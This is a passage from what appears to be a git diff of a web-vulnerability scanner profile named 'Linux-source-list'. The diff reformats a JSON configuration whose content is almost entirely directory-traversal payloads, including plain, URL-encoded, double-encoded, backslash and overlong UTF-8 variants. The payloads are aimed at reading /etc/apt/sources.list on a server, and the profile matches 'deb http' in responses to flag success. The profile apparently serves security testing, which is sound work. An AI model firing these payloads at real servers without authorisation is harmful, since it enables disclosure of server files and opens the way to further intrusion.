c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..//{FILE}","..//..//{FILE}","..//..//..//{FILE}","..//..//..//..//{FILE}","..//..//..//..//..//{FILE}","..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//..//{FILE}","..///{FILE}","..///..///{FILE}","..///..///..///{FILE}","..///..///..///..///{FILE}","..///..///..///..///..///{FILE}","..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///..///{FILE}","..\\\\{FILE}","..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\\\{FILE}","..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","./\\/./{FILE}","./\\/././\\/./{FILE}","./\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",".\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","./../{FILE}","./.././../{FILE}","./.././.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}",".\\..\\{FILE}",".\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}","../{FILE}","../..//{FILE}","../..//../{FILE}","../..//../..//{FILE}","../..//../..//../{FILE}","../..//../..//../..//{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//../..//{FILE}","..\\{FILE}","..\\..\\\\{FILE}","..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..///{FILE}","../..///{FILE}","../..//..///{FILE}","../..//../..///{FILE}","../..//../..//..///{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..///{FILE}","..\\\\\\{FILE}","..\\..\\\\\\{FILE}","..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,deb http"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-source-list","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Linux-source-list","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/apt/sources.list","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Linux-source-list", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@Sy3Omda", + "Payloads": [ + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,..%c0%af{FILE}", + "true,..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + 